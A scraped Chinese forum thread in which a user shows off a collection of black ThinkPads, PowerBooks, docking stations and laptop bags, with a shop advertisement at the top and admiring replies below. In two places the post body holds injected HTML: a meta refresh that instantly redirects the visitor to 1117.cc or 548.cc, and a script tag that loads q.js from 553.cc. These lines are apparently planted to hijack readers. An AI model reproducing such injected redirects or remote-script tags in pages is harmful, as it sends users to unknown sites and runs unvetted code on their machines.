开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 黑社会用品!!

这两天又入手了一个X32.... 1.7 1g 80g wifi

顺便把其他黑社会用品照了一下...
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

这可是POWERBOOK,别以为苹果都是白色的,呵呵.现在用这个防身

这可是POWERBOOK,别以为苹果都是白色的,呵呵.现在用这个防身

和X32对比一下,两个X32的厚度

和X32对比一下,两个X32的厚度

打开看看... 手感比X32强多了,电池现在竟然还能用2-3个小时

打开看看... 手感比X32强多了,电池现在竟然还能用2-3个小时

比较一下,面积是差不多的.那个时候的一个鼠标键一直沿用至今

比较一下,面积是差不多的.那个时候的一个鼠标键一直沿用至今

超级无敌2631扩展坞,我在里面装了一个看电视的PCI卡

超级无敌2631扩展坞,我在里面装了一个看电视的PCI卡

T43经常用的内包

T43经常用的内包

上面是X32,下面是T43

上面是X32,下面是T43

XXX 不知道有没有朋友知道这个的,可是好东西啊

XXX 不知道有没有朋友知道这个的,可是好东西啊

3970,要是有WIFI就更完美了,平时用这个在车上看电影,或者新东方的FLASH

3970,要是有WIFI就更完美了,平时用这个在车上看电影,或者新东方的FLASH

MS鼠标掂和MS鼠标,觉得和小黑很是配

MS鼠标掂和MS鼠标,觉得和小黑很是配
不太会照相, 用的是黑色的SONY U20...200万象素,只比手机强一点,各位凑合看吧
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

贝耳金的USB HUB, 向上的USB口设计的真是很方便

贝耳金的USB HUB, 向上的USB口设计的真是很方便

对比一下,X32还是小了不少

对比一下,X32还是小了不少

我的网络设备.一个是LINKSYS一个MS的

我的网络设备.一个是LINKSYS一个MS的

歌德的耳机M1. 非常好非常好的耳机,很值.和小黑非常配

歌德的耳机M1. 非常好非常好的耳机,很值.和小黑非常配

以前发过的图,小飞机,两给小黑

以前发过的图,小飞机,两给小黑

一个T43一个T22,事实上,还是老机子键盘舒服

一个T43一个T22,事实上,还是老机子键盘舒服

厚度对比

厚度对比

N年前 DELL送的包,做工超级好.设计的也不错,就是沉.

N年前 DELL送的包,做工超级好.设计的也不错,就是沉.

黑黑的自行车,和小黑也挺配的,不知道这里有没有玩车的哥们

黑黑的自行车,和小黑也挺配的,不知道这里有没有玩车的哥们

贝而金的包包,钢性很强,可以防身用

贝而金的包包,钢性很强,可以防身用
快成杀猫贴了

HP的原装包,比IBM给的红点包做工是强多了

HP的原装包,比IBM给的红点包做工是强多了

最喜欢的中国科学院微生物所的包,开会的时候发的,封面的LOGO可是SARS啊!

最喜欢的中国科学院微生物所的包,开会的时候发的,封面的LOGO可是SARS啊!

ONE POLAR的包,做工还说的过去,休闲时候背.ONE POLAR的电脑包比较实惠,手头不宽余的朋友可以多考虑一下

ONE POLAR的包,做工还说的过去,休闲时候背.ONE POLAR的电脑包比较实惠,手头不宽余的朋友可以多考虑一下

天盾P1. 200多,做工还行,长时间使用之后才发现明显不如SUMDEX的好

天盾P1. 200多,做工还行,长时间使用之后才发现明显不如SUMDEX的好

天盾P16 ,这个包比P1做的好多了,价格也便宜,觉得是天盾系列里最值得买的

天盾P16 ,这个包比P1做的好多了,价格也便宜,觉得是天盾系列里最值得买的

SUMDEX的尊爵系列. 样子怪了点,里面的设计和做工绝对是一流.

SUMDEX的尊爵系列. 样子怪了点,里面的设计和做工绝对是一流.

SUMDEX的大黑包.我第一个包,用了若干年到现在还没有什么磨损,真佩服SUMDEX的质量

SUMDEX的大黑包.我第一个包,用了若干年到现在还没有什么磨损,真佩服SUMDEX的质量
上面都是黑道的东西....

下面这个是俺的小飞机

苹果蓝牙鼠标和IPOD... RAZOR新出的鼠标垫觉得和"大白肥皂"很配

苹果蓝牙鼠标和IPOD...  RAZOR新出的鼠标垫觉得和"大白肥皂"很配

小飞机

小飞机
不是吧,lz是个收藏家吧羡慕
忘记补充一句:   以上照片都是本人私人物品,不得未经许可擅自转自它用,一经发现,后果自负
前天新买的HP DVD

新买的HP DVD

新买的HP DVD
你哪个老的powerbook好老啊
我也有一个

到现在还转的欢
我这个是3400C 200MHZ的, 用的是MAC OS 8 ... 你的那个怎么样?
有米之人!!!
不错啊 老大 …………
真不错
哈哈
缺一个PSP

眼花缭乱,好牛哦

8错8错,欣赏了一把:)
原帖由 阿拉韩 于 2006-2-27 21:36 发表
哈哈
缺一个PSP

呵呵,别说,还真考虑过,不过因为本人不爱玩游戏,看视频随身用PDA,所以PSP对俺没什么用 .

apple powerbook 3400c
apple powerbook 12'
ibm thinkpad t22
ibm thinkpad t43 71u
ibm thinkpad x32 1G 80G

这5个本本中,手感最好的是T22 ,然后是小飞机,然后是老飞机, T43已经差了一点, 最差的是X32....

摸到X32的一刹那,心理咯噔一下....  这就是IBM的手感... 有点退步...

使用频率最多的是T22和T43, X32次之,然后是小飞机(一般娱乐用,看片不错) , 最后POWERBOOK 已经做为收藏了...毕竟频率是200MHZ的,

而且只是CD光区(读盘能力还不错),但是MAC OS 8限制了他. 不知道哪位兄弟会在上面装MAC OS 9....

其实X3X系列现在比较鸡肋了... 用的话,不如T4X爽, 拿的话不如X4X轻便.... 不过你也可以理解为用着比X4X爽,拿着比T4X轻便.

但是笔记本是用的,买本本的那么多人,有几个人在公车上,在野外,在餐厅,在飞机厂用个小本本放在桌子上放在腿上上网或者工作.

这样的人很少吧,大部分还是在家里或者在单位公司等地,插着电源用. 所以T4X才是我们的真正选择....

X41 什么的,还是留给MM用吧,呵呵.....
沾点边了,是和声音有关
DIGIBOY
man  in  black
楼主够猛,真是“黑”呀!!!
只要心不黑就行.... 嘿嘿
长见识,楼主的装备果然非同反响!!!!
真是个有米人啊,羡慕,太羡慕了
口水ing~~~~
强啊。。。
LZ是做什么工作的呀。。。
这么多玩意?
呵呵